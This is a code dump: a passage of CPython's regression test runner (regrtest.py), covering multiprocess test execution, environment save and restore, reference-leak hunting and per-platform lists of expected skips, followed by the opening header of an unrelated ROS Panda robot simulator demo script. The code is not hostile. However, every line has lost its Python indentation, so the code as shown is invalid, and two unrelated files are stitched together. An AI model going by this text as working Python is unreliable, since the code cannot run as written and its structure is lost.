print("Using random seed", random_seed)
random.shuffle(selected)
if trace:
import trace, tempfile
tracer = trace.Trace(ignoredirs=[sys.base_prefix, sys.base_exec_prefix,
tempfile.gettempdir()],
trace=False, count=True)
test_times = []
support.verbose = verbose # Tell tests to be moderately quiet
support.use_resources = use_resources
save_modules = sys.modules.keys()
def accumulate_result(test, result):
ok, test_time = result
test_times.append((test_time, test))
if ok == PASSED:
good.append(test)
elif ok == FAILED:
bad.append(test)
elif ok == ENV_CHANGED:
environment_changed.append(test)
elif ok == SKIPPED:
skipped.append(test)
elif ok == RESOURCE_DENIED:
skipped.append(test)
resource_denieds.append(test)
if forever:
def test_forever(tests=list(selected)):
while True:
for test in tests:
yield test
if bad:
return
tests = test_forever()
test_count = ''
test_count_width = 3
else:
tests = iter(selected)
test_count = '/{}'.format(len(selected))
test_count_width = len(test_count) - 1
if use_mp:
try:
from threading import Thread
except ImportError:
print("Multiprocess option requires thread support")
sys.exit(2)
from queue import Queue
from subprocess import Popen, PIPE
debug_output_pat = re.compile(r"\[\d+ refs\]$")
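# A debug build's interpreter prints a final line such as "[84527 refs]" on exit
# (the count shown here is illustrative); that line is stripped from stderr below.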
output = Queue()
pending = MultiprocessTests(tests)
opt_args = support.args_from_interpreter_flags()
base_cmd = [sys.executable] + opt_args + ['-m', 'test.regrtest']
def work():
# A worker thread.
try:
while True:
try:
test = next(pending)
except StopIteration:
output.put((None, None, None, None))
return
args_tuple = (
(test, verbose, quiet),
dict(huntrleaks=huntrleaks, use_resources=use_resources,
debug=debug, output_on_failure=verbose3,
timeout=timeout, failfast=failfast,
match_tests=match_tests)
)
# -E is needed by some tests, e.g. test_import
# Running the child from the same working directory ensures
# that TEMPDIR for the child is the same when
# sysconfig.is_python_build() is true. See issue 15300.
popen = Popen(base_cmd + ['--slaveargs', json.dumps(args_tuple)],
stdout=PIPE, stderr=PIPE,
universal_newlines=True,
close_fds=(os.name != 'nt'),
cwd=support.SAVEDCWD)
stdout, stderr = popen.communicate()
retcode = popen.wait()
# Strip last refcount output line if it exists, since it
# comes from the shutdown of the interpreter in the subcommand.
stderr = debug_output_pat.sub("", stderr)
stdout, _, result = stdout.strip().rpartition("\n")
if retcode != 0:
result = (CHILD_ERROR, "Exit code %s" % retcode)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
return
if not result:
output.put((None, None, None, None))
return
result = json.loads(result)
output.put((test, stdout.rstrip(), stderr.rstrip(), result))
except BaseException:
output.put((None, None, None, None))
raise
workers = [Thread(target=work) for i in range(use_mp)]
for worker in workers:
worker.start()
finished = 0
test_index = 1
try:
while finished < use_mp:
test, stdout, stderr, result = output.get()
if test is None:
finished += 1
continue
accumulate_result(test, result)
if not quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count,
len(bad), test))
if stdout:
print(stdout)
if stderr:
print(stderr, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
if result[0] == INTERRUPTED:
raise KeyboardInterrupt
if result[0] == CHILD_ERROR:
raise Exception("Child error on {}: {}".format(test, result[1]))
test_index += 1
except KeyboardInterrupt:
interrupted = True
pending.interrupted = True
for worker in workers:
worker.join()
else:
for test_index, test in enumerate(tests, 1):
if not quiet:
fmt = "[{1:{0}}{2}/{3}] {4}" if bad else "[{1:{0}}{2}] {4}"
print(fmt.format(
test_count_width, test_index, test_count, len(bad), test))
sys.stdout.flush()
if trace:
# If we're tracing code coverage, we don't exit with a status based
# on the return value from main.
tracer.runctx('runtest(test, verbose, quiet, timeout=timeout)',
globals=globals(), locals=vars())
else:
try:
result = runtest(test, verbose, quiet, huntrleaks, debug,
output_on_failure=verbose3,
timeout=timeout, failfast=failfast,
match_tests=match_tests)
accumulate_result(test, result)
except KeyboardInterrupt:
interrupted = True
break
except:
raise
if findleaks:
gc.collect()
if gc.garbage:
print("Warning: test created", len(gc.garbage), end=' ')
print("uncollectable object(s).")
# move the uncollectable objects somewhere so we don't see
# them again
found_garbage.extend(gc.garbage)
del gc.garbage[:]
# Unload the newly imported modules (best effort finalization)
for module in sys.modules.keys():
if module not in save_modules and module.startswith("test."):
support.unload(module)
if interrupted:
# print a newline after ^C
print()
print("Test suite interrupted by signal SIGINT.")
omitted = set(selected) - set(good) - set(bad) - set(skipped)
print(count(len(omitted), "test"), "omitted:")
printlist(omitted)
if good and not quiet:
if not bad and not skipped and not interrupted and len(good) > 1:
print("All", end=' ')
print(count(len(good), "test"), "OK.")
if print_slow:
test_times.sort(reverse=True)
print("10 slowest tests:")
for time, test in test_times[:10]:
print("%s: %.1fs" % (test, time))
if bad:
bad = sorted(set(bad) - set(environment_changed))
if bad:
print(count(len(bad), "test"), "failed:")
printlist(bad)
if environment_changed:
print("{} altered the execution environment:".format(
count(len(environment_changed), "test")))
printlist(environment_changed)
if skipped and not quiet:
print(count(len(skipped), "test"), "skipped:")
printlist(skipped)
e = _ExpectedSkips()
plat = sys.platform
if e.isvalid():
surprise = set(skipped) - e.getexpected() - set(resource_denieds)
if surprise:
print(count(len(surprise), "skip"), \
"unexpected on", plat + ":")
printlist(surprise)
else:
print("Those skips are all expected on", plat + ".")
else:
print("Ask someone to teach regrtest.py about which tests are")
print("expected to get skipped on", plat + ".")
if verbose2 and bad:
print("Re-running failed tests in verbose mode")
for test in bad:
print("Re-running test %r in verbose mode" % test)
sys.stdout.flush()
try:
verbose = True
ok = runtest(test, True, quiet, huntrleaks, debug, timeout=timeout)
except KeyboardInterrupt:
# print a newline separate from the ^C
print()
break
except:
raise
if single:
if next_single_test:
with open(filename, 'w') as fp:
fp.write(next_single_test + '\n')
else:
os.unlink(filename)
if trace:
r = tracer.results()
r.write_results(show_missing=True, summary=True, coverdir=coverdir)
if runleaks:
os.system("leaks %d" % os.getpid())
sys.exit(len(bad) > 0 or interrupted)
# small set of tests to determine if we have a basically functioning interpreter
# (i.e. if any of these fail, then anything else is likely to follow)
STDTESTS = [
'test_grammar',
'test_opcodes',
'test_dict',
'test_builtin',
'test_exceptions',
'test_types',
'test_unittest',
'test_doctest',
'test_doctest2',
'test_support'
]
# set of tests that we don't want to be executed when using regrtest
NOTTESTS = set()
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
"""Return a list of all applicable test modules."""
testdir = findtestdir(testdir)
names = os.listdir(testdir)
tests = []
others = set(stdtests) | nottests
for name in names:
mod, ext = os.path.splitext(name)
if mod[:5] == "test_" and ext in (".py", "") and mod not in others:
tests.append(mod)
return stdtests + sorted(tests)
# We do not use a generator so multiple threads can call next().
class MultiprocessTests(object):
"""A thread-safe iterator over tests for multiprocess mode."""
def __init__(self, tests):
self.interrupted = False
self.lock = threading.Lock()
self.tests = tests
def __iter__(self):
return self
def __next__(self):
with self.lock:
if self.interrupted:
raise StopIteration('tests interrupted')
return next(self.tests)
def replace_stdout():
"""Set stdout encoder error handler to backslashreplace (as stderr error
handler) to avoid UnicodeEncodeError when printing a traceback"""
import atexit
stdout = sys.stdout
sys.stdout = open(stdout.fileno(), 'w',
encoding=stdout.encoding,
errors="backslashreplace",
closefd=False,
newline='\n')
def restore_stdout():
sys.stdout.close()
sys.stdout = stdout
atexit.register(restore_stdout)
def runtest(test, verbose, quiet,
huntrleaks=False, debug=False, use_resources=None,
output_on_failure=False, failfast=False, match_tests=None,
timeout=None):
"""Run a single test.
test -- the name of the test
verbose -- if true, print more messages
quiet -- if true, don't print 'skipped' messages (probably redundant)
huntrleaks -- run multiple times to test for leaks; requires a debug
build; a triple corresponding to -R's three arguments
output_on_failure -- if true, display test output on failure
timeout -- dump the traceback and exit if a test takes more than
timeout seconds
Returns one of the test result constants:
INTERRUPTED KeyboardInterrupt when run under -j
RESOURCE_DENIED test skipped because resource denied
SKIPPED test skipped for some other reason
ENV_CHANGED test failed because it changed the execution environment
FAILED test failed
PASSED test passed
"""
if use_resources is not None:
support.use_resources = use_resources
use_timeout = (timeout is not None)
if use_timeout:
faulthandler.dump_tracebacks_later(timeout, exit=True)
try:
support.match_tests = match_tests
if failfast:
support.failfast = True
if output_on_failure:
support.verbose = True
# Reuse the same instance for all calls to runtest(). Some
# tests keep a reference to sys.stdout or sys.stderr
# (eg. test_argparse).
if runtest.stringio is None:
stream = io.StringIO()
runtest.stringio = stream
else:
stream = runtest.stringio
stream.seek(0)
stream.truncate()
orig_stdout = sys.stdout
orig_stderr = sys.stderr
try:
sys.stdout = stream
sys.stderr = stream
result = runtest_inner(test, verbose, quiet, huntrleaks,
debug, display_failure=False)
if result[0] == FAILED:
output = stream.getvalue()
orig_stderr.write(output)
orig_stderr.flush()
finally:
sys.stdout = orig_stdout
sys.stderr = orig_stderr
else:
support.verbose = verbose # Tell tests to be moderately quiet
result = runtest_inner(test, verbose, quiet, huntrleaks, debug,
display_failure=not verbose)
return result
finally:
if use_timeout:
faulthandler.cancel_dump_tracebacks_later()
cleanup_test_droppings(test, verbose)
runtest.stringio = None
# Unit tests are supposed to leave the execution environment unchanged
# once they complete. But sometimes tests have bugs, especially when
# tests fail, and the changes to environment go on to mess up other
# tests. This can cause issues with buildbot stability, since tests
# are run in random order and so problems may appear to come and go.
# There are a few things we can save and restore to mitigate this, and
# the following context manager handles this task.
class saved_test_environment:
"""Save bits of the test environment and restore them at block exit.
with saved_test_environment(testname, verbose, quiet):
#stuff
Unless quiet is True, a warning is printed to stderr if any of
the saved items was changed by the test. The attribute 'changed'
is initially False, but is set to True if a change is detected.
If verbose is more than 1, the before and after state of changed
items is also printed.
"""
changed = False
def __init__(self, testname, verbose=0, quiet=False):
self.testname = testname
self.verbose = verbose
self.quiet = quiet
# To add things to save and restore, add a name XXX to the resources list
# and add corresponding get_XXX/restore_XXX functions. get_XXX should
# return the value to be saved and compared against a second call to the
# get function when test execution completes. restore_XXX should accept
# the saved value and restore the resource using it. It will be called if
# and only if a change in the value is detected.
#
# Note: XXX will have any '.' replaced with '_' characters when determining
# the corresponding method names.
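# For example, the resource 'sys.argv' is handled by the get_sys_argv() /
# restore_sys_argv() pair defined below.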
resources = ('sys.argv', 'cwd', 'sys.stdin', 'sys.stdout', 'sys.stderr',
'os.environ', 'sys.path', 'sys.path_hooks', '__import__',
'warnings.filters', 'asyncore.socket_map',
'logging._handlers', 'logging._handlerList', 'sys.gettrace',
'sys.warnoptions', 'threading._dangling',
'multiprocessing.process._dangling',
'sysconfig._CONFIG_VARS', 'sysconfig._INSTALL_SCHEMES',
'support.TESTFN',
)
def get_sys_argv(self):
return id(sys.argv), sys.argv, sys.argv[:]
def restore_sys_argv(self, saved_argv):
sys.argv = saved_argv[1]
sys.argv[:] = saved_argv[2]
def get_cwd(self):
return os.getcwd()
def restore_cwd(self, saved_cwd):
os.chdir(saved_cwd)
def get_sys_stdout(self):
return sys.stdout
def restore_sys_stdout(self, saved_stdout):
sys.stdout = saved_stdout
def get_sys_stderr(self):
return sys.stderr
def restore_sys_stderr(self, saved_stderr):
sys.stderr = saved_stderr
def get_sys_stdin(self):
return sys.stdin
def restore_sys_stdin(self, saved_stdin):
sys.stdin = saved_stdin
def get_os_environ(self):
return id(os.environ), os.environ, dict(os.environ)
def restore_os_environ(self, saved_environ):
os.environ = saved_environ[1]
os.environ.clear()
os.environ.update(saved_environ[2])
def get_sys_path(self):
return id(sys.path), sys.path, sys.path[:]
def restore_sys_path(self, saved_path):
sys.path = saved_path[1]
sys.path[:] = saved_path[2]
def get_sys_path_hooks(self):
return id(sys.path_hooks), sys.path_hooks, sys.path_hooks[:]
def restore_sys_path_hooks(self, saved_hooks):
sys.path_hooks = saved_hooks[1]
sys.path_hooks[:] = saved_hooks[2]
def get_sys_gettrace(self):
return sys.gettrace()
def restore_sys_gettrace(self, trace_fxn):
sys.settrace(trace_fxn)
def get___import__(self):
return builtins.__import__
def restore___import__(self, import_):
builtins.__import__ = import_
def get_warnings_filters(self):
return id(warnings.filters), warnings.filters, warnings.filters[:]
def restore_warnings_filters(self, saved_filters):
warnings.filters = saved_filters[1]
warnings.filters[:] = saved_filters[2]
def get_asyncore_socket_map(self):
asyncore = sys.modules.get('asyncore')
# XXX Making a copy keeps objects alive until __exit__ gets called.
return asyncore and asyncore.socket_map.copy() or {}
def restore_asyncore_socket_map(self, saved_map):
asyncore = sys.modules.get('asyncore')
if asyncore is not None:
asyncore.close_all(ignore_all=True)
asyncore.socket_map.update(saved_map)
def get_shutil_archive_formats(self):
# we could call get_archive_formats() but that only returns the
# registry keys; we want to check the values too (the functions that
# are registered)
return shutil._ARCHIVE_FORMATS, shutil._ARCHIVE_FORMATS.copy()
def restore_shutil_archive_formats(self, saved):
shutil._ARCHIVE_FORMATS = saved[0]
shutil._ARCHIVE_FORMATS.clear()
shutil._ARCHIVE_FORMATS.update(saved[1])
def get_shutil_unpack_formats(self):
return shutil._UNPACK_FORMATS, shutil._UNPACK_FORMATS.copy()
def restore_shutil_unpack_formats(self, saved):
shutil._UNPACK_FORMATS = saved[0]
shutil._UNPACK_FORMATS.clear()
shutil._UNPACK_FORMATS.update(saved[1])
def get_logging__handlers(self):
# _handlers is a WeakValueDictionary
return id(logging._handlers), logging._handlers, logging._handlers.copy()
def restore_logging__handlers(self, saved_handlers):
# Can't easily revert the logging state
pass
def get_logging__handlerList(self):
# _handlerList is a list of weakrefs to handlers
return id(logging._handlerList), logging._handlerList, logging._handlerList[:]
def restore_logging__handlerList(self, saved_handlerList):
# Can't easily revert the logging state
pass
def get_sys_warnoptions(self):
return id(sys.warnoptions), sys.warnoptions, sys.warnoptions[:]
def restore_sys_warnoptions(self, saved_options):
sys.warnoptions = saved_options[1]
sys.warnoptions[:] = saved_options[2]
# Controlling dangling references to Thread objects can make it easier
# to track reference leaks.
def get_threading__dangling(self):
if not threading:
return None
# This copies the weakrefs without making any strong reference
return threading._dangling.copy()
def restore_threading__dangling(self, saved):
if not threading:
return
threading._dangling.clear()
threading._dangling.update(saved)
# Same for Process objects
def get_multiprocessing_process__dangling(self):
if not multiprocessing:
return None
# This copies the weakrefs without making any strong reference
return multiprocessing.process._dangling.copy()
def restore_multiprocessing_process__dangling(self, saved):
if not multiprocessing:
return
multiprocessing.process._dangling.clear()
multiprocessing.process._dangling.update(saved)
def get_sysconfig__CONFIG_VARS(self):
# make sure the dict is initialized
sysconfig.get_config_var('prefix')
return (id(sysconfig._CONFIG_VARS), sysconfig._CONFIG_VARS,
dict(sysconfig._CONFIG_VARS))
def restore_sysconfig__CONFIG_VARS(self, saved):
sysconfig._CONFIG_VARS = saved[1]
sysconfig._CONFIG_VARS.clear()
sysconfig._CONFIG_VARS.update(saved[2])
def get_sysconfig__INSTALL_SCHEMES(self):
return (id(sysconfig._INSTALL_SCHEMES), sysconfig._INSTALL_SCHEMES,
sysconfig._INSTALL_SCHEMES.copy())
def restore_sysconfig__INSTALL_SCHEMES(self, saved):
sysconfig._INSTALL_SCHEMES = saved[1]
sysconfig._INSTALL_SCHEMES.clear()
sysconfig._INSTALL_SCHEMES.update(saved[2])
def get_support_TESTFN(self):
if os.path.isfile(support.TESTFN):
result = 'f'
elif os.path.isdir(support.TESTFN):
result = 'd'
else:
result = None
return result
def restore_support_TESTFN(self, saved_value):
if saved_value is None:
if os.path.isfile(support.TESTFN):
os.unlink(support.TESTFN)
elif os.path.isdir(support.TESTFN):
shutil.rmtree(support.TESTFN)
def resource_info(self):
for name in self.resources:
method_suffix = name.replace('.', '_')
get_name = 'get_' + method_suffix
restore_name = 'restore_' + method_suffix
yield name, getattr(self, get_name), getattr(self, restore_name)
def __enter__(self):
self.saved_values = dict((name, get()) for name, get, restore
in self.resource_info())
return self
def __exit__(self, exc_type, exc_val, exc_tb):
saved_values = self.saved_values
del self.saved_values
for name, get, restore in self.resource_info():
current = get()
original = saved_values.pop(name)
# Check for changes to the resource's value
if current != original:
self.changed = True
restore(original)
if not self.quiet:
print("Warning -- {} was modified by {}".format(
name, self.testname),
file=sys.stderr)
if self.verbose > 1:
print(" Before: {}\n After: {} ".format(
original, current),
file=sys.stderr)
return False
def runtest_inner(test, verbose, quiet,
huntrleaks=False, debug=False, display_failure=True):
support.unload(test)
test_time = 0.0
refleak = False # True if the test leaked references.
try:
if test.startswith('test.'):
abstest = test
else:
# Always import it from the test package
abstest = 'test.' + test
with saved_test_environment(test, verbose, quiet) as environment:
start_time = time.time()
the_package = __import__(abstest, globals(), locals(), [])
the_module = getattr(the_package, test)
# If the test has a test_main, that will run the appropriate
# tests. If not, use normal unittest test loading.
test_runner = getattr(the_module, "test_main", None)
if test_runner is None:
tests = unittest.TestLoader().loadTestsFromModule(the_module)
test_runner = lambda: support.run_unittest(tests)
test_runner()
if huntrleaks:
refleak = dash_R(the_module, test, test_runner,
huntrleaks)
test_time = time.time() - start_time
except support.ResourceDenied as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return RESOURCE_DENIED, test_time
except unittest.SkipTest as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return SKIPPED, test_time
except KeyboardInterrupt:
raise
except support.TestFailed as msg:
if display_failure:
print("test", test, "failed --", msg, file=sys.stderr)
else:
print("test", test, "failed", file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
except:
msg = traceback.format_exc()
print("test", test, "crashed --", msg, file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
else:
if refleak:
return FAILED, test_time
if environment.changed:
return ENV_CHANGED, test_time
return PASSED, test_time
def cleanup_test_droppings(testname, verbose):
import shutil
import stat
import gc
# First kill any dangling references to open files etc.
# This can also issue some ResourceWarnings which would otherwise get
# triggered during the following test run, and possibly produce failures.
gc.collect()
# Try to clean up junk commonly left behind. While tests shouldn't leave
# any files or directories behind, when a test fails that can be tedious
# for it to arrange. The consequences can be especially nasty on Windows,
# since if a test leaves a file open, it cannot be deleted by name (while
# there's nothing we can do about that here either, we can display the
# name of the offending test, which is a real help).
for name in (support.TESTFN,
"db_home",
):
if not os.path.exists(name):
continue
if os.path.isdir(name):
kind, nuker = "directory", shutil.rmtree
elif os.path.isfile(name):
kind, nuker = "file", os.unlink
else:
raise SystemError("os.path says %r exists but is neither "
"directory nor file" % name)
if verbose:
print("%r left behind %s %r" % (testname, kind, name))
try:
# if we have chmod, fix possible permissions problems
# that might prevent cleanup
if (hasattr(os, 'chmod')):
os.chmod(name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
nuker(name)
except Exception as msg:
print(("%r left behind %s %r and it couldn't be "
"removed: %s" % (testname, kind, name, msg)), file=sys.stderr)
def dash_R(the_module, test, indirect_test, huntrleaks):
"""Run a test multiple times, looking for reference leaks.
Returns:
False if the test didn't leak references; True if we detected refleaks.
"""
# This code is hackish and inelegant, but it seems to do the job.
import copyreg
import collections.abc
if not hasattr(sys, 'gettotalrefcount'):
raise Exception("Tracking reference leaks requires a debug build "
"of Python")
# Save current values for dash_R_cleanup() to restore.
fs = warnings.filters[:]
ps = copyreg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
try:
import zipimport
except ImportError:
zdc = None # Run unmodified on platforms without zipimport support
else:
zdc = zipimport._zip_directory_cache.copy()
abcs = {}
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
abcs[obj] = obj._abc_registry.copy()
if indirect_test:
def run_the_test():
indirect_test()
else:
def run_the_test():
del sys.modules[the_module.__name__]
exec('import ' + the_module.__name__)
deltas = []
nwarmup, ntracked, fname = huntrleaks
fname = os.path.join(support.SAVEDCWD, fname)
repcount = nwarmup + ntracked
print("beginning", repcount, "repetitions", file=sys.stderr)
print(("1234567890"*(repcount//10 + 1))[:repcount], file=sys.stderr)
sys.stderr.flush()
dash_R_cleanup(fs, ps, pic, zdc, abcs)
for i in range(repcount):
rc_before = sys.gettotalrefcount()
run_the_test()
sys.stderr.write('.')
sys.stderr.flush()
dash_R_cleanup(fs, ps, pic, zdc, abcs)
rc_after = sys.gettotalrefcount()
if i >= nwarmup:
deltas.append(rc_after - rc_before)
print(file=sys.stderr)
if any(deltas):
msg = '%s leaked %s references, sum=%s' % (test, deltas, sum(deltas))
print(msg, file=sys.stderr)
sys.stderr.flush()
with open(fname, "a") as refrep:
print(msg, file=refrep)
refrep.flush()
return True
return False
def dash_R_cleanup(fs, ps, pic, zdc, abcs):
import gc, copyreg
import _strptime, linecache
import urllib.parse, urllib.request, mimetypes, doctest
import struct, filecmp, collections.abc
from distutils.dir_util import _path_created
from weakref import WeakSet
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Restore some original values.
warnings.filters[:] = fs
copyreg.dispatch_table.clear()
copyreg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
try:
import zipimport
except ImportError:
pass # Run unmodified on platforms without zipimport support
else:
zipimport._zip_directory_cache.clear()
zipimport._zip_directory_cache.update(zdc)
# clear type cache
sys._clear_type_cache()
# Clear ABC registries, restoring previously saved ABC registries.
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
obj._abc_registry = abcs.get(obj, WeakSet()).copy()
obj._abc_cache.clear()
obj._abc_negative_cache.clear()
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
_path_created.clear()
re.purge()
_strptime._regex_cache.clear()
urllib.parse.clear_cache()
urllib.request.urlcleanup()
linecache.clearcache()
mimetypes._default_mime_types()
filecmp._cache.clear()
struct._clearcache()
doctest.master = None
try:
import ctypes
except ImportError:
# Don't worry about resetting the cache if ctypes is not supported
pass
else:
ctypes._reset_cache()
# Collect cyclic trash.
gc.collect()
def warm_caches():
# char cache
s = bytes(range(256))
for i in range(256):
s[i:i+1]
# unicode cache
x = [chr(i) for i in range(256)]
# int cache
x = list(range(-5, 257))
def findtestdir(path=None):
return path or os.path.dirname(__file__) or os.curdir
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks))
# Map sys.platform to a string containing the basenames of tests
# expected to be skipped on that platform.
#
# Special cases:
# test_pep277
# The _ExpectedSkips constructor adds this to the set of expected
# skips if not os.path.supports_unicode_filenames.
# test_timeout
# Controlled by test_timeout.skip_expected. Requires the network
# resource and a socket module.
#
# Tests that are expected to be skipped everywhere except on one platform
# are also handled separately.
_expectations = (
('win32',
"""
test__locale
test_crypt
test_curses
test_dbm
test_devpoll
test_fcntl
test_fork1
test_epoll
test_dbm_gnu
test_dbm_ndbm
test_grp
test_ioctl
test_largefile
test_kqueue
test_openpty
test_ossaudiodev
test_pipes
test_poll
test_posix
test_pty
test_pwd
test_resource
test_signal
test_syslog
test_threadsignals
test_wait3
test_wait4
"""),
('linux',
"""
test_curses
test_devpoll
test_largefile
test_kqueue
test_ossaudiodev
"""),
('unixware',
"""
test_epoll
test_largefile
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_sax
test_sundry
"""),
('openunix',
"""
test_epoll
test_largefile
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_sax
test_sundry
"""),
('sco_sv',
"""
test_asynchat
test_fork1
test_epoll
test_gettext
test_largefile
test_locale
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_queue
test_sax
test_sundry
test_thread
test_threaded_import
test_threadedtempfile
test_threading
"""),
('darwin',
"""
test__locale
test_curses
test_devpoll
test_epoll
test_dbm_gnu
test_gdb
test_largefile
test_locale
test_minidom
test_ossaudiodev
test_poll
"""),
('sunos',
"""
test_curses
test_dbm
test_epoll
test_kqueue
test_dbm_gnu
test_gzip
test_openpty
test_zipfile
test_zlib
"""),
('hp-ux',
"""
test_curses
test_epoll
test_dbm_gnu
test_gzip
test_largefile
test_locale
test_kqueue
test_minidom
test_openpty
test_pyexpat
test_sax
test_zipfile
test_zlib
"""),
('cygwin',
"""
test_curses
test_dbm
test_devpoll
test_epoll
test_ioctl
test_kqueue
test_largefile
test_locale
test_ossaudiodev
test_socketserver
"""),
('os2emx',
"""
test_audioop
test_curses
test_epoll
test_kqueue
test_largefile
test_mmap
test_openpty
test_ossaudiodev
test_pty
test_resource
test_signal
"""),
('freebsd',
"""
test_devpoll
test_epoll
test_dbm_gnu
test_locale
test_ossaudiodev
test_pep277
test_pty
test_socketserver
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_timeout
test_urllibnet
test_multiprocessing
"""),
('aix',
"""
test_bz2
test_epoll
test_dbm_gnu
test_gzip
test_kqueue
test_ossaudiodev
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_zipimport
test_zlib
"""),
('openbsd',
"""
test_ctypes
test_devpoll
test_epoll
test_dbm_gnu
test_locale
test_normalization
test_ossaudiodev
test_pep277
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_multiprocessing
"""),
('netbsd',
"""
test_ctypes
test_curses
test_devpoll
test_epoll
test_dbm_gnu
test_locale
test_ossaudiodev
test_pep277
test_tcl
test_tk
test_ttk_guionly
test_ttk_textonly
test_multiprocessing
"""),
)
class _ExpectedSkips:
def __init__(self):
import os.path
from test import test_timeout
self.valid = False
expected = None
for item in _expectations:
if sys.platform.startswith(item[0]):
expected = item[1]
break
if expected is not None:
self.expected = set(expected.split())
# These are broken tests, for now skipped on every platform.
# XXX Fix these!
self.expected.add('test_nis')
# expected to be skipped on every platform, even Linux
if not os.path.supports_unicode_filenames:
self.expected.add('test_pep277')
# doctest, profile and cProfile tests fail when the codec for the
# fs encoding isn't built in because PyUnicode_Decode() adds two
# calls into Python.
encs = ("utf-8", "latin-1", "ascii", "mbcs", "utf-16", "utf-32")
if sys.getfilesystemencoding().lower() not in encs:
self.expected.add('test_profile')
self.expected.add('test_cProfile')
self.expected.add('test_doctest')
if test_timeout.skip_expected:
self.expected.add('test_timeout')
if sys.platform != "win32":
# test_sqlite is only reliable on Windows where the library
# is distributed with Python
WIN_ONLY = {"test_unicode_file", "test_winreg",
"test_winsound", "test_startfile",
"test_sqlite", "test_msilib"}
self.expected |= WIN_ONLY
if sys.platform != 'sunos5':
self.expected.add('test_nis')
if support.python_is_optimized():
self.expected.add("test_gdb")
self.valid = True
def isvalid(self):
"Return true iff _ExpectedSkips knows about the current platform."
return self.valid
def getexpected(self):
"""Return set of test names we expect to skip on current platform.
self.isvalid() must be true.
"""
assert self.isvalid()
return self.expected
def _make_temp_dir_for_build(TEMPDIR):
# When tests are run from the Python build directory, it is best practice
# to keep the test files in a subfolder. It eases the cleanup of leftover
# files using command "make distclean".
if sysconfig.is_python_build():
TEMPDIR = os.path.join(sysconfig.get_config_var('srcdir'), 'build')
TEMPDIR = os.path.abspath(TEMPDIR)
try:
os.mkdir(TEMPDIR)
except FileExistsError:
pass
# Define a writable temp dir that will be used as cwd while running
# the tests. The name of the dir includes the pid to allow parallel
# testing (see the -j option).
TESTCWD = 'test_python_{}'.format(os.getpid())
TESTCWD = os.path.join(TEMPDIR, TESTCWD)
return TEMPDIR, TESTCWD
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. Despite
# the elimination of implicit relative imports, this is still needed to
# ensure that submodules of the test package do not inappropriately appear
# as top-level modules even when people (or buildbots!) invoke regrtest.py
# directly instead of using the -m switch
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
# findtestdir() gets the dirname out of __file__, so we have to make it
# absolute before changing the working directory.
# For example __file__ may be relative when running trace or profile.
# See issue #9323.
__file__ = os.path.abspath(__file__)
# sanity check
assert __file__ == os.path.abspath(sys.argv[0])
TEMPDIR, TESTCWD = _make_temp_dir_for_build(TEMPDIR)
# Run the tests in a context manager that temporarily changes the CWD to a
# temporary and writable directory. If it's not possible to create or
# change the CWD, the original CWD will be used. The original CWD is
# available from support.SAVEDCWD.
with support.temp_cwd(TESTCWD, quiet=True):
main()
|
task_space_control_with_fri.py
|
#!/usr/bin/env python
# /***************************************************************************
#
# @package: panda_simulator_examples
# @metapackage: panda_simulator
# @author: Saif Sidhik <sxs1412@bham.ac.uk>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
"""
This is a demo showing task-space control on the
simulator robot using the Franka ROS Interface
(https://github.com/justagist/franka_ros_interface).
( A more unified package called panda_robot is
available, which simplifies and combines all the
functionality of Franka ROS Interface and
provides a simpler, more intuitive Python API.
https://github.com/justagist/panda_robot )
The task-space force for the desired pose is computed
using a simple PD law, and the corresponding
joint torques are computed and sent to the robot.
USAGE:
After launching the simulator (panda_world.launch),
run this demo using the command:
roslaunch panda_simulator_examples demo_task_space_control.launch --use_fri:=true
"""
import copy
import rospy
